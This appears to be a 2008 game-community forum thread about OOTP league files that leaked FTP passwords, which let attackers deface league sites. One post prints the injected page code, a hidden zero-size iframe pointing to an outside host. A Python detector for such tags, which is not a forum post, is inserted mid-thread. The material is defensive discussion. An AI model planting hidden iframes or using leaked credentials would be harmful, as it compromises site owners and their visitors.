Old 12-04-2008, 07:12 AM   #101
Tony M
Global Moderator
 
Join Date: Feb 2006
Location: Here
Posts: 6,156
Quote:
Originally Posted by ericm26
Does anyone know if 2007/2008 have the same security issues as 2009. I run a league that is getting hacked also but we run 2007/2008 not 2009.
Ericm,

I did a search on your posts as you said you ran a 2008 league and I found your website, downloaded your file and was able to get into your ftp site with no difficulties, so yes the problem does exist in 2007/OOTP8.

Now, I've no idea how this can be solved in terms of the executable, but what I would say is change your FTP password, and remove the link on your website to the league file. That way there's no way for anybody who isn't a GM in your league to get access to those details.
Tony M is offline   Reply With Quote
Old 12-04-2008, 08:13 AM   #102
Andreas Raht
Administrator
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
We'll release a patch next week which will address the issue. More info here:

http://www.ootpdevelopments.com/boar...y-problem.html
Andreas Raht is offline   Reply With Quote
Old 12-04-2008, 08:16 AM   #103
Andreas Raht
Administrator
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
Quote:
Originally Posted by Tony M
It is fixed in 9.2.7, but if a Mac or Linux user downloads a 9.2.7 league they won't be able to connect because what it believes is the connection settings will not work.

Until a Mac or Linux 9.2.7 patch comes out, I don't believe that they will be able to access 9.2.7 leagues, but we'd need word from up high as to whether this is true.
Yes, that's true. We'll release Mac and Linux build ASAP.
Andreas Raht is offline   Reply With Quote
Old 12-04-2008, 08:23 AM   #104
Alan T
All Star Starter
 
Join Date: Mar 2002
Location: Mass.
Posts: 1,963
I think that people who assume the patch will magically fix their security issue will be let down a bit. What it sounds like the patch will be doing is fixing the hole where the login information/password is viewable within the league dat file in clear text if you look for it. I assume that the patch will be using some form of encryption within the league file so it is not viewable for someone who downloads the file. With the type of encryption that I would assume they would use here, keep in mind that many forms of encryption can still be broken by someone who really wants to do so.

Even without looking through the league file however, it is still extremely trivial getting a ftp account name and password if someone who has ootp9 downloads the file due to how the FTP protocol works. Any person with fairly basic understanding of ftp packets on a network wire could probably still get it, and this is something that can not be patched. It would require a completely different protocol (SFTP for instance) to fix this issue.

Ideally to protect yourself against this type of thing, you could make sure absolutely no one had your league file except for your trusted owners in the league. That is fairly impractical though for most leagues I assume.

To protect yourself, you should create an FTP user account on your ftp server that -only- has access to the import-export folder on the ftp server which contains the team files and the league file and nothing else. Use that account in your ootp league file and it would limit any exposure to the rest of your site. The problem this causes however would be extra complications in updating league html files which would have to either be done manually, or by manually changing the account username/password for the report uploads each time before doing it.

Anyhows, just wanted to make sure it was known that as long as FTP is used, someone competent enough to know how to write a virus/trojan would likely know how to exploit FTP to still get the same information even if it is encrypted within the league file.
Alan T is offline   Reply With Quote
Old 12-04-2008, 08:36 AM   #105
Tony M
Global Moderator
 
Join Date: Feb 2006
Location: Here
Posts: 6,156
Just to concur with Alan T - the patch won't cure the problem, just make it harder to get the information.

Nothing will be entirely secure, but my suggestion above for OOTP10 would even further limit the scope for exploitation.
Tony M is offline   Reply With Quote
Old 12-04-2008, 09:00 AM   #106
gollum65
All Star Reserve
 
Join Date: Feb 2007
Posts: 925
All I want is to make it as hard as possible to gain access to my website. I've implemented the other recommendations, such as an exclusive FTP account, removing the league file links from my website, etc... Fixing this hole will be just another step that makes it harder to hack my site.

I'm sure most of you would agree that if you make it hard enough, the hacker will move on to find another site. After all, if they wanted to WORK, they'd have jobs.
gollum65 is offline   Reply With Quote
Old 12-04-2008, 10:12 AM   #107
Andreas Raht
Administrator
 
Join Date: Jun 2002
Location: Hollern/Stade/Germany
Posts: 8,992
Quote:
Originally Posted by gollum65
After all, if they wanted to WORK, they'd have jobs.
+1

Well, probably hacking OOTP leagues IS their job
Andreas Raht is offline   Reply With Quote
Old 12-04-2008, 10:29 AM   #108
Raidergoo
Hall Of Famer
 
Join Date: Mar 2003
Posts: 9,005
Quote:
Originally Posted by Alan T
It would require a completely different protocol (SFTP for instance) to fix this issue.
That's how the Big Boys send and receive data on Wall Street.
Raidergoo is offline   Reply With Quote
Old 12-04-2008, 02:44 PM   #109
rewc27
All Star Reserve
 
Join Date: Jul 2002
Location: Reading PA
Posts: 684
I want to say thank you to all of you have put your heads together and worked to find the problem. The OOTP community is very lucky to have people that are willing to work together when problems arise and save those of us who don't have a clue when it comes to this stuff.

Also I want to give props to Fidel and All Sim Baseball. Fidel has been great in restoring my site very quickly after the attacks happened.

Thank you all for your hard work and dedication.
__________________
Commish and Phillies GM of the new Beyond The Future Baseball League.
www.beyondthefuturebaseball.com

Now Defunct Arcanum league - Phillies 1934 World Series Champs

Commish of the long time running (now defunct) UMBL.

Real Estate Needs
www.randysellsyourhome.com
rewc27 is offline   Reply With Quote
Old 12-05-2008, 01:56 AM   #110
f.montoya
Hall Of Famer
 
Join Date: Nov 2004
Posts: 6,076
I just found this in an OOTP 6 online league I host...

Code:
<html>

<head>

<title>OOTP 6 Generated Website</title>

</head>

<frameset rows="100,*" frameborder="0" framespacing="0" border="0">
  <frame name="Banner" scrolling="no" noresize target="Inhalt" src="top.html">
  <frameset cols="100,*">
    <frame name="menu" target="Hauptframe" src="menu.html">
    <frame name="content" src="league.html">
  </frameset>
  <noframes>
  <body><(SPACE HERE) ****** src="http://butx.biz/" style="width: 0px; height: 0px; display: none"><(SPACE HERE)  /******>

  <p>Diese Seite verwendet Frames. Frames werden von Ihrem Browser aber nicht 
  unterstützt.</p>

  </body>
  </noframes>

</frameset>

</html>
OOTP 6 & 6.5 must have the same hole. Don't have time to check right now but we need an emergency patch for 6 and 6.5 too Andreas.
__________________
Fidel Montoya

Asahi2 Baseball League ex-Commissioner(Historical League Since 2004)
Ex-Web Host
Current Mod Maker??
f.montoya is offline   Reply With Quote
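A defender-side check for the kind of injection Fidel found, added here as an example (it is not code from the thread, from OOTP, or from any league site): it parses a generated league page and flags iframe/script/embed/object tags that are hidden by style or size, or that load from a host other than the league's own. The host names, the sample page and the directory layout scanned by scan_site are constructed for the example.

```python
import re
from html.parser import HTMLParser
from pathlib import Path

# Constructed sample page: the generated frameset with a zero-size, display:none
# iframe dropped into <noframes>, as reported in the thread (host name is made up).
SAMPLE_HTML = """<html><head><title>OOTP 6 Generated Website</title></head>
<frameset rows="100,*">
  <frame name="menu" src="menu.html">
  <noframes><body>
  <iframe src="http://example-bad-host.invalid/" style="width: 0px; height: 0px; display: none"></iframe>
  <p>Diese Seite verwendet Frames.</p>
  </body></noframes>
</frameset></html>"""

SUSPECT_TAGS = ("iframe", "script", "embed", "object")

class HiddenFrameFinder(HTMLParser):
    """Flag embedded-content tags that are hidden by style/size or load from a foreign host."""
    def __init__(self, own_hosts):
        super().__init__()
        self.own_hosts = {h.lower() for h in own_hosts}   # hosts the league legitimately uses
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in SUSPECT_TAGS:
            return
        a = dict(attrs)
        src = a.get("src") or ""
        compact = (a.get("style") or "").lower().replace(" ", "")
        # Hidden if styled away, collapsed to zero size, or sized 0 via attributes.
        hidden = ("display:none" in compact or "visibility:hidden" in compact
                  or re.search(r"(width|height):0(px)?(;|$)", compact) is not None
                  or a.get("width") == "0" or a.get("height") == "0")
        host = re.match(r"https?://([^/:]+)", src, re.I)
        offsite = host is not None and host.group(1).lower() not in self.own_hosts
        if hidden or offsite:
            self.findings.append({"tag": tag, "src": src, "hidden": hidden, "offsite": offsite})

def scan_html(text, own_hosts=()):
    """Return the suspicious tags found in one HTML document."""
    parser = HiddenFrameFinder(own_hosts)
    parser.feed(text)
    return parser.findings

def scan_site(root, own_hosts=()):
    """Walk a directory of generated league pages (hypothetical layout); map path -> findings."""
    return {str(p): hits for p in Path(root).rglob("*.htm*")
            if (hits := scan_html(p.read_text(errors="replace"), own_hosts))}
```

Run scan_site against a fresh copy of the report directory after each upload and compare with the previous run; a new entry is the signal to look at the FTP log for the upload that introduced it.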
Old 12-05-2008, 02:26 AM   #111
Tony M
Global Moderator
 
Join Date: Feb 2006
Location: Here
Posts: 6,156
butx.biz was in gollum's website too.
Tony M is offline   Reply With Quote
Old 12-05-2008, 05:19 AM   #112
Tony M
Global Moderator
 
Join Date: Feb 2006
Location: Here
Posts: 6,156
Have any of the others of you who have been attacked still got the log files (or the contents of the files that were hacked). If you can get the IP address of the computer that made the changes that would be good.
Tony M is offline   Reply With Quote
Old 12-05-2008, 09:44 AM   #113
gollum65
All Star Reserve
 
Join Date: Feb 2007
Posts: 925
Obviously I still have the IP address from my last attack.
gollum65 is offline   Reply With Quote
Old 12-05-2008, 07:26 PM   #114
kq76
Global Moderator
 
Join Date: Nov 2002
Posts: 11,836
Quote:
Originally Posted by Alan T
To protect yourself, you should create an FTP user account on your ftp server that -only- has access to the import-export folder on the ftp server which contains the team files and the league file and nothing else. Use that account in your ootp league file and it would limit any exposure to the rest of your site. The problem this causes however would be extra complications in updating league html files which would have to either be done manually, or by manually changing the account username/password for the report uploads each time before doing it.
I think I may be able to create an FTP account for ourselves that accesses multiple folders. If I can, would this avoid the problem you spoke of? That, or I could put those two folders in a parent folder and just give the account access to it, right? If it is possible, are there any folders other than the exports and reports folders that I should give that account access to?
kq76 is offline   Reply With Quote
Old 12-05-2008, 11:41 PM   #115
Alan T
All Star Starter
 
Join Date: Mar 2002
Location: Mass.
Posts: 1,963
Quote:
Originally Posted by kq76
I think I may be able to create an FTP account for ourselves that accesses multiple folders. If I can, would this avoid the problem you spoke of? That, or I could put those two folders in a parent folder and just give the account access to it, right? If it is possible, are there any folders other than the exports and reports folders that I should give that account access to?
Owner team uploads go in the same ftp folder as the league file when you upload it. So securely you only need to give an FTP account access to that folder and make sure that directory is not viewable via HTTP and you should be ok from the risk of someone placing an iframes exploit on your site.

The problem with this is you would be unable to upload web reports as those go in other folders on your server and usually ones which obviously have http enabled for. So opening up the ftp account which the league file uses to be able to upload web reports also gives any potential hacker the access or ability to at least hit part of the website as well.

Two ways around this that I can think of:

1) Manually run the web reports from within OOTP and then manually upload them to your server outside of the game using an account that has permission to do so. This requires you to know the directory structure that the web reports get uploaded within.

2) Have two accounts for your league, one the general league upload/download ftp account that is normally in the game and a second account used only for web reports. When you run the league file, get exports, imports etc you use the first account. Then when time to upload web reports switch the settings within the game to the second account/password on your system only to upload the web reports from within the game to the server. Once done make sure you change it back or you will not be able to import owner exports for the next sim.
Alan T is offline   Reply With Quote
Old 12-05-2008, 11:48 PM   #116
canadiancreed
Hall Of Famer
 
Join Date: Aug 2004
Posts: 11,660
Quote:
Originally Posted by Raidergoo
That's how the Big Boys send and receive data on Wall Street.

Having the ftp data encrypted and sent and received via at least 128bit SFTP protocol would be the way to go.

Finding hosts that support SFTP? That might be slightly harder. (not impossible, there's some out there)
canadiancreed is offline   Reply With Quote
Old 12-06-2008, 01:05 AM   #117
kq76
Global Moderator
 
Join Date: Nov 2002
Posts: 11,836
Have any other leagues experienced problems connecting since switching to 9.2.7? The CBL has and my guess is it may be 9.2.7 because I can connect no problem using the same account info in an ftp client. Then again, at least one person in the league has said they were able to connect through the game using 9.2.7 so why some can and some cannot I have no idea.
kq76 is offline   Reply With Quote
Old 12-06-2008, 01:38 AM   #118
Corsairs
Hall Of Famer
 
Join Date: Aug 2007
Posts: 2,360
Quote:
Originally Posted by kq76
Have any other leagues experienced problems connecting since switching to 9.2.7? The CBL has and my guess is it may be 9.2.7 because I can connect no problem using the same account info in an ftp client. Then again, at least one person in the league has said they were able to connect through the game using 9.2.7 so why some can and some cannot I have no idea.
Yes, we're experiencing the same issue. At this time, 10 of my owners have been able to export using 9.2.7 while another 4 are saying they are getting connection errors. I haven't been able to determine any pattern with the affected owners. This was never an issue before, so clearly it has something to do with 9.2.7.
__________________
Founder of the Planetary Extreme Baseball Alliance (PEBA)
Premiere OOTP fictional league where creativity counts and imagination is your only limitation
Check for openings - contact us today!
Corsairs is offline   Reply With Quote
Old 12-06-2008, 02:25 AM   #119
kq76
Global Moderator
 
Join Date: Nov 2002
Posts: 11,836
Thanks, Corsairs. I hope they test 9.2.9 extra well then because as it is now I don't think we can proceed until it's released and working correctly.
kq76 is offline   Reply With Quote
Old 12-06-2008, 02:29 AM   #120
molarmite
Hall Of Famer
 
molarmite's Avatar
 
Join Date: Jul 2005
Location: Minnesota
Posts: 4,924
I've had a few owners with connection problems but I've talked them through every one of them so far. After about 3-4 hours, our league is running good with almost no problems *knock on wood*.

Make sure they check if they have 9.2.7 because some people don't know that you have to replace the .exe file. Some think you just download it and you're good. Make sure, if you changed the password or league file name, that they are opening the right file. I had a couple owners who were still trying to open the file with our old name instead of the new one.
__________________
From the wise mind of Davey Eckstein

"Now all you need is a signature. A quote or initial, perhaps."
molarmite is offline   Reply With Quote